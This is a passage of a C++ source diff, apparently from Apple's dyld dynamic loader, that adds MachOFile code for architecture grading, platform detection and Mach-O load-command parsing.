arm64e_keysoff : arm64e); +#elif __ARM64_ARCH_8_32__ + return arm64_32; +#elif __arm64__ + return arm64; +#elif __ARM_ARCH_7K__ + return armv7k; +#elif __ARM_ARCH_7S__ + return armv7s; +#elif __ARM_ARCH_7A__ + return armv7; +#elif __x86_64__ + #if TARGET_OS_SIMULATOR + return x86_64; + #else + return isHaswell() ? x86_64h : x86_64; + #endif +#elif __i386__ + return i386; +#else + #error unknown platform +#endif +} + +#if BUILDING_LIBDYLD || BUILDING_UNIT_TESTS +const GradedArchs& GradedArchs::launchCurrentOS(const char* simArches) +{ +#if TARGET_OS_SIMULATOR + // on Apple Silicon, there is both an arm64 and an x86_64 (under rosetta) simulators + // You cannot tell if you are running under rosetta, so CoreSimulator sets SIMULATOR_ARCHS + if ( strcmp(simArches, "arm64 x86_64") == 0 ) + return launch_AS_Sim; + else + return x86_64; +#elif TARGET_OS_OSX + #if __arm64__ + return launch_AS; + #else + return isHaswell() ? launch_Intel_h : launch_Intel; + #endif +#else + // all other platforms use same grading for executables as dylibs + return forCurrentOS(true, false); +#endif +} +#endif // BUILDING_LIBDYLD + +const GradedArchs& GradedArchs::forName(const char* archName, bool keysOff) +{ + if (strcmp(archName, "x86_64h") == 0 ) + return x86_64h; + else if (strcmp(archName, "x86_64") == 0 ) + return x86_64; +#if SUPPORT_ARCH_arm64e + else if (strcmp(archName, "arm64e") == 0 ) + return keysOff ? 
arm64e_keysoff : arm64e; +#endif + else if (strcmp(archName, "arm64") == 0 ) + return arm64; + else if (strcmp(archName, "armv7k") == 0 ) + return armv7k; + else if (strcmp(archName, "armv7s") == 0 ) + return armv7s; + else if (strcmp(archName, "armv7") == 0 ) + return armv7; + else if (strcmp(archName, "armv7m") == 0 ) + return armv7m; + else if (strcmp(archName, "armv7em") == 0 ) + return armv7em; +#if SUPPORT_ARCH_arm64_32 + else if (strcmp(archName, "arm64_32") == 0 ) + return arm64_32; +#endif + else if (strcmp(archName, "i386") == 0 ) + return i386; + assert(0 && "unknown arch name"); +} + + + +//////////////////////////// MachOFile //////////////////////////////////////// + + +const MachOFile::ArchInfo MachOFile::_s_archInfos[] = { + { "x86_64", CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_ALL }, + { "x86_64h", CPU_TYPE_X86_64, CPU_SUBTYPE_X86_64_H }, + { "i386", CPU_TYPE_I386, CPU_SUBTYPE_I386_ALL }, + { "arm64", CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64_ALL }, +#if SUPPORT_ARCH_arm64e + { "arm64e", CPU_TYPE_ARM64, CPU_SUBTYPE_ARM64E }, +#endif +#if SUPPORT_ARCH_arm64_32 + { "arm64_32", CPU_TYPE_ARM64_32, CPU_SUBTYPE_ARM64_32_V8 }, +#endif + { "armv7k", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7K }, + { "armv7s", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7S }, + { "armv7", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7 }, + { "armv6m", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V6M }, + { "armv7m", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7M }, + { "armv7em", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V7EM }, + { "armv8m", CPU_TYPE_ARM, CPU_SUBTYPE_ARM_V8M }, +}; + +const MachOFile::PlatformInfo MachOFile::_s_platformInfos[] = { + { "macOS", Platform::macOS, LC_VERSION_MIN_MACOSX }, + { "iOS", Platform::iOS, LC_VERSION_MIN_IPHONEOS }, + { "tvOS", Platform::tvOS, LC_VERSION_MIN_TVOS }, + { "watchOS", Platform::watchOS, LC_VERSION_MIN_WATCHOS }, + { "bridgeOS", Platform::bridgeOS, LC_BUILD_VERSION }, + { "MacCatalyst", Platform::iOSMac, LC_BUILD_VERSION }, + { "iOS-sim", Platform::iOS_simulator, LC_BUILD_VERSION }, + { "tvOS-sim", 
Platform::tvOS_simulator, LC_BUILD_VERSION }, + { "watchOS-sim", Platform::watchOS_simulator, LC_BUILD_VERSION }, + { "driverKit", Platform::driverKit, LC_BUILD_VERSION }, +}; + + + +bool MachOFile::is64() const +{ + return (this->magic == MH_MAGIC_64); +} + +size_t MachOFile::machHeaderSize() const +{ + return is64() ? sizeof(mach_header_64) : sizeof(mach_header); +} + +uint32_t MachOFile::maskedCpuSubtype() const +{ + return (this->cpusubtype & ~CPU_SUBTYPE_MASK); +} + +uint32_t MachOFile::pointerSize() const +{ + if (this->magic == MH_MAGIC_64) + return 8; + else + return 4; +} + +bool MachOFile::uses16KPages() const +{ + switch (this->cputype) { + case CPU_TYPE_ARM64: + case CPU_TYPE_ARM64_32: + return true; + case CPU_TYPE_ARM: + // iOS is 16k aligned for armv7/armv7s and watchOS armv7k is 16k aligned + // HACK: Pretend armv7k kexts are 4k aligned + if ( this->isKextBundle() ) + return false; + return this->cpusubtype == CPU_SUBTYPE_ARM_V7K; + default: + return false; + } +} + +bool MachOFile::isArch(const char* aName) const +{ + return (strcmp(aName, archName(this->cputype, this->cpusubtype)) == 0); +} + +const char* MachOFile::archName(uint32_t cputype, uint32_t cpusubtype) +{ + for (const ArchInfo& info : _s_archInfos) { + if ( (cputype == info.cputype) && ((cpusubtype & ~CPU_SUBTYPE_MASK) == info.cpusubtype) ) { + return info.name; + } + } + return "unknown"; +} + +bool MachOFile::cpuTypeFromArchName(const char* archName, cpu_type_t* cputype, cpu_subtype_t* cpusubtype) +{ + for (const ArchInfo& info : _s_archInfos) { + if ( strcmp(archName, info.name) == 0 ) { + *cputype = info.cputype; + *cpusubtype = info.cpusubtype; + return true; + } + } + return false; +} + +const char* MachOFile::archName() const +{ + return archName(this->cputype, this->cpusubtype); +} + +static void appendDigit(char*& s, unsigned& num, unsigned place, bool& startedPrinting) +{ + if ( num >= place ) { + unsigned dig = (num/place); + *s++ = '0' + dig; + num -= (dig*place); + 
startedPrinting = true; + } + else if ( startedPrinting ) { + *s++ = '0'; + } +} + +static void appendNumber(char*& s, unsigned num) +{ + assert(num < 99999); + bool startedPrinting = false; + appendDigit(s, num, 10000, startedPrinting); + appendDigit(s, num, 1000, startedPrinting); + appendDigit(s, num, 100, startedPrinting); + appendDigit(s, num, 10, startedPrinting); + appendDigit(s, num, 1, startedPrinting); + if ( !startedPrinting ) + *s++ = '0'; +} + +void MachOFile::packedVersionToString(uint32_t packedVersion, char versionString[32]) +{ + // sprintf(versionString, "%d.%d.%d", (packedVersion >> 16), ((packedVersion >> 8) & 0xFF), (packedVersion & 0xFF)); + char* s = versionString; + appendNumber(s, (packedVersion >> 16)); + *s++ = '.'; + appendNumber(s, (packedVersion >> 8) & 0xFF); + if ( (packedVersion & 0xFF) != 0 ) { + *s++ = '.'; + appendNumber(s, (packedVersion & 0xFF)); + } + *s++ = '\0'; +} + +bool MachOFile::builtForPlatform(Platform reqPlatform, bool onlyOnePlatform) const +{ + __block bool foundRequestedPlatform = false; + __block bool foundOtherPlatform = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + if ( platform == reqPlatform ) + foundRequestedPlatform = true; + else + foundOtherPlatform = true; + }); + // if checking that this binary is built for exactly one platform, fail if more + if ( foundOtherPlatform && onlyOnePlatform ) + return false; + if ( foundRequestedPlatform ) + return true; + + // binary has no explict load command to mark platform + // could be an old macOS binary, look at arch + if ( !foundOtherPlatform && (reqPlatform == Platform::macOS) ) { + if ( this->cputype == CPU_TYPE_X86_64 ) + return true; + if ( this->cputype == CPU_TYPE_I386 ) + return true; + } + +#if BUILDING_DYLDINFO + // Allow offline tools to analyze binaries dyld doesn't load, ie, those with platforms + if ( !foundOtherPlatform && (reqPlatform == Platform::unknown) ) + return true; +#endif + + return false; +} + 
// Returns true if an image built the way this one is may be loaded into a
// process running on `processPlatform`.  Beyond an exact platform match,
// several documented-in-code cross-platform exceptions apply (see below).
bool MachOFile::loadableIntoProcess(Platform processPlatform, const char* path, bool internalInstall) const
{
    // exact platform match is always loadable
    if ( this->builtForPlatform(processPlatform) )
        return true;

    // Some host macOS dylibs can be loaded into simulator processes
    // (only the fixed allow-list of paths below)
    if ( MachOFile::isSimulatorPlatform(processPlatform) && this->builtForPlatform(Platform::macOS)) {
        static const char* const macOSHost[] = {
            "/usr/lib/system/libsystem_kernel.dylib",
            "/usr/lib/system/libsystem_platform.dylib",
            "/usr/lib/system/libsystem_pthread.dylib",
            "/usr/lib/system/libsystem_platform_debug.dylib",
            "/usr/lib/system/libsystem_pthread_debug.dylib",
            "/usr/lib/system/host/liblaunch_sim.dylib",
        };
        for (const char* libPath : macOSHost) {
            if (strcmp(libPath, path) == 0)
                return true;
        }
    }

    // If this is being called on main executable where we expect a macOS program, Catalyst programs are also runnable
    if ( (this->filetype == MH_EXECUTE) && (processPlatform == Platform::macOS) && this->builtForPlatform(Platform::iOSMac, true) )
        return true;
#if (TARGET_OS_OSX && TARGET_CPU_ARM64)
    // on Apple Silicon macOS, iOS-only main executables are also runnable
    if ( (this->filetype == MH_EXECUTE) && (processPlatform == Platform::macOS) && this->builtForPlatform(Platform::iOS, true) )
        return true;
#endif


    bool iOSonMac = (processPlatform == Platform::iOSMac);
#if (TARGET_OS_OSX && TARGET_CPU_ARM64)
    // allow iOS binaries in iOSApp
    if ( processPlatform == Platform::iOS ) {
        // can load Catalyst binaries into iOS process
        if ( this->builtForPlatform(Platform::iOSMac) )
            return true;
        iOSonMac = true;
    }
#endif
    // macOS dylibs can be loaded into iOSMac processes
    if ( (iOSonMac) && this->builtForPlatform(Platform::macOS, true) )
        return true;


    return false;
}

// Returns true if this image declares BOTH macOS and Mac Catalyst (iOSMac)
// platform load commands (a "zippered" binary).
// NOTE: this definition continues past this span; only comments added here.
bool MachOFile::isZippered() const
{
    __block bool macOS = false;
    __block bool iOSMac = false;
    forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) {
        if ( platform == Platform::macOS )
            macOS = true;
        else if ( platform == Platform::iOSMac )
iOSMac = true; + }); + return macOS && iOSMac; +} + +bool MachOFile::inDyldCache() const { + return (this->flags & MH_DYLIB_IN_CACHE); +} + +Platform MachOFile::currentPlatform() +{ +#if TARGET_OS_SIMULATOR + #if TARGET_OS_WATCH + return Platform::watchOS_simulator; + #elif TARGET_OS_TV + return Platform::tvOS_simulator; + #else + return Platform::iOS_simulator; + #endif +#elif TARGET_OS_BRIDGE + return Platform::bridgeOS; +#elif TARGET_OS_WATCH + return Platform::watchOS; +#elif TARGET_OS_TV + return Platform::tvOS; +#elif TARGET_OS_IOS + return Platform::iOS; +#elif TARGET_OS_OSX + return Platform::macOS; +#elif TARGET_OS_DRIVERKIT + return Platform::driverKit; +#else + #error unknown platform +#endif +} + +Platform MachOFile::basePlatform(dyld3::Platform reqPlatform) { + switch(reqPlatform) { + case Platform::unknown: return Platform::unknown; + case Platform::macOS: return Platform::macOS; + case Platform::iOS: return Platform::iOS; + case Platform::tvOS: return Platform::tvOS; + case Platform::watchOS: return Platform::watchOS; + case Platform::bridgeOS: return Platform::bridgeOS; + case Platform::iOSMac: return Platform::iOS; + case Platform::iOS_simulator: return Platform::iOS; + case Platform::tvOS_simulator: return Platform::tvOS; + case Platform::watchOS_simulator: return Platform::watchOS; + case Platform::driverKit: return Platform::driverKit; + default: return Platform::unknown; + } +} + + +const char* MachOFile::currentArchName() +{ +#if __ARM_ARCH_7K__ + return "armv7k"; +#elif __ARM_ARCH_7A__ + return "armv7"; +#elif __ARM_ARCH_7S__ + return "armv7s"; +#elif __arm64e__ + return "arm64e"; +#elif __arm64__ +#if __LP64__ + return "arm64"; +#else + return "arm64_32"; +#endif +#elif __x86_64__ + return isHaswell() ? 
"x86_64h" : "x86_64"; +#elif __i386__ + return "i386"; +#else + #error unknown arch +#endif +} + +bool MachOFile::isSimulatorPlatform(Platform platform, Platform* basePlatform) +{ + switch ( platform ) { + case Platform::iOS_simulator: + if ( basePlatform ) + *basePlatform = Platform::iOS; + return true; + case Platform::watchOS_simulator: + if ( basePlatform ) + *basePlatform = Platform::watchOS; + return true; + case Platform::tvOS_simulator: + if ( basePlatform ) + *basePlatform = Platform::tvOS; + return true; + default: + return false; + } +} + +bool MachOFile::isBuiltForSimulator() const +{ + __block bool result = false; + this->forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + switch ( platform ) { + case Platform::iOS_simulator: + case Platform::watchOS_simulator: + case Platform::tvOS_simulator: + result = true; + break; + default: + break; + } + }); + return result; +} + +bool MachOFile::isDyld() const +{ + return (this->filetype == MH_DYLINKER); +} + +bool MachOFile::isDyldManaged() const { + switch ( this->filetype ) { + case MH_BUNDLE: + case MH_EXECUTE: + case MH_DYLIB: + return true; + default: + break; + } + return false; +} + +bool MachOFile::isDylib() const +{ + return (this->filetype == MH_DYLIB); +} + +bool MachOFile::isBundle() const +{ + return (this->filetype == MH_BUNDLE); +} + +bool MachOFile::isMainExecutable() const +{ + return (this->filetype == MH_EXECUTE); +} + +bool MachOFile::isDynamicExecutable() const +{ + if ( this->filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return hasLoadCommand(LC_LOAD_DYLINKER); +} + +bool MachOFile::isStaticExecutable() const +{ + if ( this->filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return !hasLoadCommand(LC_LOAD_DYLINKER); +} + +bool MachOFile::isKextBundle() const +{ + return (this->filetype == MH_KEXT_BUNDLE); +} + +bool MachOFile::isFileSet() const +{ + return 
(this->filetype == MH_FILESET); +} + +bool MachOFile::isPIE() const +{ + return (this->flags & MH_PIE); +} + +bool MachOFile::isPreload() const +{ + return (this->filetype == MH_PRELOAD); +} + +const char* MachOFile::platformName(Platform reqPlatform) +{ + for (const PlatformInfo& info : _s_platformInfos) { + if ( info.platform == reqPlatform ) + return info.name; + } + return "unknown"; +} + +void MachOFile::forEachSupportedPlatform(void (^handler)(Platform platform, uint32_t minOS, uint32_t sdk)) const +{ + Diagnostics diag; + __block bool foundPlatform = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + const build_version_command* buildCmd = (build_version_command *)cmd; + const version_min_command* versCmd = (version_min_command*)cmd; + uint32_t sdk; + switch ( cmd->cmd ) { + case LC_BUILD_VERSION: + handler((Platform)(buildCmd->platform), buildCmd->minos, buildCmd->sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_MACOSX: + sdk = versCmd->sdk; + // The original LC_VERSION_MIN_MACOSX did not have an sdk field, assume sdk is same as minOS for those old binaries + if ( sdk == 0 ) + sdk = versCmd->version; + handler(Platform::macOS, versCmd->version, sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_IPHONEOS: + if ( (this->cputype == CPU_TYPE_X86_64) || (this->cputype == CPU_TYPE_I386) ) + handler(Platform::iOS_simulator, versCmd->version, versCmd->sdk); // old sim binary + else + handler(Platform::iOS, versCmd->version, versCmd->sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_TVOS: + if ( this->cputype == CPU_TYPE_X86_64 ) + handler(Platform::tvOS_simulator, versCmd->version, versCmd->sdk); // old sim binary + else + handler(Platform::tvOS, versCmd->version, versCmd->sdk); + foundPlatform = true; + break; + case LC_VERSION_MIN_WATCHOS: + if ( (this->cputype == CPU_TYPE_X86_64) || (this->cputype == CPU_TYPE_I386) ) + handler(Platform::watchOS_simulator, versCmd->version, versCmd->sdk); // old sim 
binary + else + handler(Platform::watchOS, versCmd->version, versCmd->sdk); + foundPlatform = true; + break; + } + }); + if ( !foundPlatform ) { + // old binary with no explicit platform +#if (BUILDING_DYLD || BUILDING_CLOSURE_UTIL) && TARGET_OS_OSX + if ( this->cputype == CPU_TYPE_X86_64 ) + handler(Platform::macOS, 0x000A0500, 0x000A0500); // guess it is a macOS 10.5 binary + // + // The Go linker emits non-standard binaries without a platform and we have to live with it. + if ( this->cputype == CPU_TYPE_ARM64 ) + handler(Platform::macOS, 0x000B0000, 0x000B0000); // guess it is a macOS 11.0 binary +#endif + } + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +void MachOFile::forEachSupportedBuildTool(void (^handler)(Platform platform, uint32_t tool, uint32_t version)) const +{ + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_BUILD_VERSION: { + const build_version_command* buildCmd = (build_version_command *)cmd; + for ( uint32_t i = 0; i != buildCmd->ntools; ++i ) { + uint32_t offset = sizeof(build_version_command) + (i * sizeof(build_tool_version)); + if ( offset >= cmd->cmdsize ) + break; + + const build_tool_version* firstTool = (const build_tool_version*)(&buildCmd[1]); + handler((Platform)(buildCmd->platform), firstTool[i].tool, firstTool[i].version); + } + } + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + + +bool MachOFile::isMachO(Diagnostics& diag, uint64_t fileSize) const +{ + if ( fileSize < sizeof(mach_header) ) { + diag.error("MachO header exceeds file length"); + return false; + } + + if ( !hasMachOMagic() ) { + // old PPC slices are not currently valid "mach-o" but should not cause an error + if ( !hasMachOBigEndianMagic() ) + diag.error("file does not start with MH_MAGIC[_64]"); + return false; + } + if ( this->sizeofcmds + machHeaderSize() 
> fileSize ) { + diag.error("load commands exceed length of first segment"); + return false; + } + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { }); + return diag.noError(); +} + + +const MachOFile* MachOFile::isMachO(const void* content) +{ + const MachOFile* mf = (MachOFile*)content; + if ( mf->hasMachOMagic() ) + return mf; + return nullptr; +} + +bool MachOFile::hasMachOMagic() const +{ + return ( (this->magic == MH_MAGIC) || (this->magic == MH_MAGIC_64) ); +} + +bool MachOFile::hasMachOBigEndianMagic() const +{ + return ( (this->magic == MH_CIGAM) || (this->magic == MH_CIGAM_64) ); +} + + +void MachOFile::forEachLoadCommand(Diagnostics& diag, void (^callback)(const load_command* cmd, bool& stop)) const +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( this->magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char *)this + sizeof(mach_header_64)); + else if ( this->magic == MH_MAGIC ) + startCmds = (load_command*)((char *)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return; // can't process big endian mach-o + else { + const uint32_t* h = (uint32_t*)this; + diag.error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h [1]); + return; // not a mach-o file + } + if ( this->filetype > 12 ) { + diag.error("unknown mach-o filetype (%u)", this->filetype); + return; + } + const load_command* const cmdsEnd = (load_command*)((char*)startCmds + this->sizeofcmds); + const load_command* const cmdsLast = (load_command*)((char*)startCmds + this->sizeofcmds - sizeof(load_command)); + const load_command* cmd = startCmds; + for (uint32_t i = 0; i < this->ncmds; ++i) { + if ( cmd > cmdsLast ) { + diag.error("malformed load command #%u of %u at %p with mh=%p, extends past sizeofcmds", i, this->ncmds, cmd, this); + return; + } + uint32_t cmdsize = cmd->cmdsize; + if ( cmdsize < 8 ) { + diag.error("malformed load command #%u of %u at %p with mh=%p, size (0x%X) too small", i, this->ncmds, cmd, this, 
cmd->cmdsize); + return; + } + if ( (cmdsize % 4) != 0 ) { + // FIXME: on 64-bit mach-o, should be 8-byte aligned, (might reveal bin-compat issues) + diag.error("malformed load command #%u of %u at %p with mh=%p, size (0x%X) not multiple of 4", i, this->ncmds, cmd, this, cmd->cmdsize); + return; + } + const load_command* nextCmd = (load_command*)((char *)cmd + cmdsize); + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + diag.error("malformed load command #%u of %u at %p with mh=%p, size (0x%X) is too large, load commands end at %p", i, this->ncmds, cmd, this, cmd->cmdsize, cmdsEnd); + return; + } + callback(cmd, stop); + if ( stop ) + return; + cmd = nextCmd; + } +} + +void MachOFile::removeLoadCommand(Diagnostics& diag, void (^callback)(const load_command* cmd, bool& remove, bool& stop)) +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( this->magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char *)this + sizeof(mach_header_64)); + else if ( this->magic == MH_MAGIC ) + startCmds = (load_command*)((char *)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return; // can't process big endian mach-o + else { + const uint32_t* h = (uint32_t*)this; + diag.error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h [1]); + return; // not a mach-o file + } + const load_command* const cmdsEnd = (load_command*)((char*)startCmds + this->sizeofcmds); + auto cmd = (load_command*)startCmds; + const uint32_t origNcmds = this->ncmds; + unsigned bytesRemaining = this->sizeofcmds; + for (uint32_t i = 0; i < origNcmds; ++i) { + bool remove = false; + auto nextCmd = (load_command*)((char *)cmd + cmd->cmdsize); + if ( cmd->cmdsize < 8 ) { + diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) too small", i, this->ncmds, cmd, this, cmd->cmdsize); + return; + } + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + diag.error("malformed load command #%d of %d at %p with mh=%p, size (0x%X) is too 
large, load commands end at %p", i, this->ncmds, cmd, this, cmd->cmdsize, cmdsEnd); + return; + } + callback(cmd, remove, stop); + if ( remove ) { + this->sizeofcmds -= cmd->cmdsize; + ::memmove((void*)cmd, (void*)nextCmd, bytesRemaining); + this->ncmds--; + } else { + bytesRemaining -= cmd->cmdsize; + cmd = nextCmd; + } + if ( stop ) + break; + } + if ( cmd ) + ::bzero(cmd, bytesRemaining); +} + + +bool MachOFile::hasObjC() const +{ + __block bool result = false; + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) { + if ( (strcmp(info.sectName, "__objc_imageinfo") == 0) && (strncmp(info.segInfo.segName, "__DATA", 6) == 0) ) { + result = true; + stop = true; + } + if ( (this->cputype == CPU_TYPE_I386) && (strcmp(info.sectName, "__image_info") == 0) && (strcmp(info.segInfo.segName, "__OBJC") == 0) ) { + result = true; + stop = true; + } + }); + return result; +} + +bool MachOFile::hasSection(const char* segName, const char* sectName) const +{ + __block bool result = false; + forEachSection(^(const SectionInfo& info, bool malformedSectionRange, bool& stop) { + if ( (strcmp(info.segInfo.segName, segName) == 0) && (strcmp(info.sectName, sectName) == 0) ) { + result = true; + stop = true; + } + }); + return result; +} + +const char* MachOFile::installName() const +{ + const char* name; + uint32_t compatVersion; + uint32_t currentVersion; + if ( getDylibInstallName(&name, &compatVersion, ¤tVersion) ) + return name; + return nullptr; +} + +bool MachOFile::getDylibInstallName(const char** installName, uint32_t* compatVersion, uint32_t* currentVersion) const +{ + Diagnostics diag; + __block bool found = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( (cmd->cmd == LC_ID_DYLIB) || (cmd->cmd == LC_ID_DYLINKER) ) { + const dylib_command* dylibCmd = (dylib_command*)cmd; + *compatVersion = dylibCmd->dylib.compatibility_version; + *currentVersion = dylibCmd->dylib.current_version; + *installName = (char*)dylibCmd + 
dylibCmd->dylib.name.offset; + found = true; + stop = true; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call + return found; +} + +bool MachOFile::getUuid(uuid_t uuid) const +{ + Diagnostics diag; + __block bool found = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UUID ) { + const uuid_command* uc = (const uuid_command*)cmd; + memcpy(uuid, uc->uuid, sizeof(uuid_t)); + found = true; + stop = true; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call + if ( !found ) + bzero(uuid, sizeof(uuid_t)); + return found; +} + +UUID MachOFile::uuid() const { + Diagnostics diag; + __block UUID result; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UUID ) { + const uuid_command* uc = (const uuid_command*)cmd; + result = UUID(uc->uuid); + stop = true; + } + }); + diag.assertNoError(); + return result; +} + +void MachOFile::forEachDependentDylib(void (^callback)(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, uint32_t compatVersion, uint32_t curVersion, bool& stop)) const +{ + Diagnostics diag; + __block unsigned count = 0; + __block bool stopped = false; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: { + const dylib_command* dylibCmd = (dylib_command*)cmd; + const char* loadPath = (char*)dylibCmd + dylibCmd->dylib.name.offset; + callback(loadPath, (cmd->cmd == LC_LOAD_WEAK_DYLIB), (cmd->cmd == LC_REEXPORT_DYLIB), (cmd->cmd == LC_LOAD_UPWARD_DYLIB), + dylibCmd->dylib.compatibility_version, dylibCmd->dylib.current_version, stop); + ++count; + if ( stop ) + stopped = true; + } + break; + } + }); +#if !BUILDING_SHARED_CACHE_UTIL && !BUILDING_DYLDINFO && !BUILDING_UNIT_TESTS + // everything must 
link with something + if ( (count == 0) && !stopped ) { + // The dylibs that make up libSystem can link with nothing + // except for dylibs in libSystem.dylib which are ok to link with nothing (they are on bottom) +#if TARGET_OS_EXCLAVEKIT + if ( !this->isDylib() || (strncmp(this->installName(), "/System/ExclaveKit/usr/lib/system/", 34) != 0) ) + callback("/System/ExclaveKit/usr/lib/libSystem.dylib", false, false, false, 0x00010000, 0x00010000, stopped); +#else + if ( this->builtForPlatform(Platform::driverKit, true) ) { + if ( !this->isDylib() || (strncmp(this->installName(), "/System/DriverKit/usr/lib/system/", 33) != 0) ) + callback("/System/DriverKit/usr/lib/libSystem.B.dylib", false, false, false, 0x00010000, 0x00010000, stopped); + } + else { + if ( !this->isDylib() || (strncmp(this->installName(), "/usr/lib/system/", 16) != 0) ) + callback("/usr/lib/libSystem.B.dylib", false, false, false, 0x00010000, 0x00010000, stopped); + } +#endif // TARGET_OS_EXCLAVEKIT + } +#endif // !BUILDING_SHARED_CACHE_UTIL && !BUILDING_DYLDINFO && !BUILDING_UNIT_TESTS + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +void MachOFile::forDyldEnv(void (^callback)(const char* envVar, bool& stop)) const +{ + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_DYLD_ENVIRONMENT ) { + const dylinker_command* envCmd = (dylinker_command*)cmd; + const char* keyEqualsValue = (char*)envCmd + envCmd->name.offset; + // only process variables that start with DYLD_ and end in _PATH + if ( (strncmp(keyEqualsValue, "DYLD_", 5) == 0) ) { + const char* equals = strchr(keyEqualsValue, '='); + if ( equals != NULL ) { + if ( strncmp(&equals[-5], "_PATH", 5) == 0 ) { + callback(keyEqualsValue, stop); + } + } + } + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +bool MachOFile::enforceCompatVersion() const +{ + 
__block bool result = true; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + switch ( platform ) { + case Platform::macOS: + if ( minOS >= 0x000A0E00 ) // macOS 10.14 + result = false; + break; + case Platform::iOS: + case Platform::tvOS: + case Platform::iOS_simulator: + case Platform::tvOS_simulator: + if ( minOS >= 0x000C0000 ) // iOS 12.0 + result = false; + break; + case Platform::watchOS: + case Platform::watchOS_simulator: + if ( minOS >= 0x00050000 ) // watchOS 5.0 + result = false; + break; + case Platform::bridgeOS: + if ( minOS >= 0x00030000 ) // bridgeOS 3.0 + result = false; + break; + case Platform::driverKit: + case Platform::iOSMac: + result = false; + break; + case Platform::unknown: + break; + } + }); + return result; +} + +const thread_command* MachOFile::unixThreadLoadCommand() const { + Diagnostics diag; + __block const thread_command* command = nullptr; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UNIXTHREAD ) { + command = (const thread_command*)cmd; + stop = true; + } + }); + return command; +} + +const linkedit_data_command* MachOFile::chainedFixupsCmd() const { + Diagnostics diag; + __block const linkedit_data_command* command = nullptr; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_DYLD_CHAINED_FIXUPS ) { + command = (const linkedit_data_command*)cmd; + stop = true; + } + }); + return command; +} + + +uint32_t MachOFile::entryAddrRegisterIndexForThreadCmd() const +{ + switch ( this->cputype ) { + case CPU_TYPE_I386: + return 10; // i386_thread_state_t.eip + case CPU_TYPE_X86_64: + return 16; // x86_thread_state64_t.rip + case CPU_TYPE_ARM: + return 15; // arm_thread_state_t.pc + case CPU_TYPE_ARM64: + case CPU_TYPE_ARM64_32: + return 32; // arm_thread_state64_t.__pc + } + return ~0U; +} + +bool MachOFile::use64BitEntryRegs() const +{ + return is64() || isArch("arm64_32"); +} + +uint64_t 
MachOFile::entryAddrFromThreadCmd(const thread_command* cmd) const +{ + assert(cmd->cmd == LC_UNIXTHREAD); + const uint32_t* regs32 = (uint32_t*)(((char*)cmd) + 16); + const uint64_t* regs64 = (uint64_t*)(((char*)cmd) + 16); + + uint32_t index = entryAddrRegisterIndexForThreadCmd(); + if (index == ~0U) + return 0; + + return use64BitEntryRegs() ? regs64[index] : regs32[index]; +} + + +bool MachOFile::getEntry(uint64_t& offset, bool& usesCRT) const +{ + Diagnostics diag; + offset = 0; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_MAIN ) { + entry_point_command* mainCmd = (entry_point_command*)cmd; + usesCRT = false; + offset = mainCmd->entryoff; + stop = true; + } + else if ( cmd->cmd == LC_UNIXTHREAD ) { + stop = true; + usesCRT = true; + uint64_t startAddress = entryAddrFromThreadCmd((thread_command*)cmd); + offset = startAddress - preferredLoadAddress(); + } + }); + return (offset != 0); +} + + +void MachOFile::forEachSegment(void (^callback)(const SegmentInfo& info, bool& stop)) const +{ + Diagnostics diag; + const bool intel32 = (this->cputype == CPU_TYPE_I386); + __block uint32_t segIndex = 0; + forEachLoadCommand(diag, 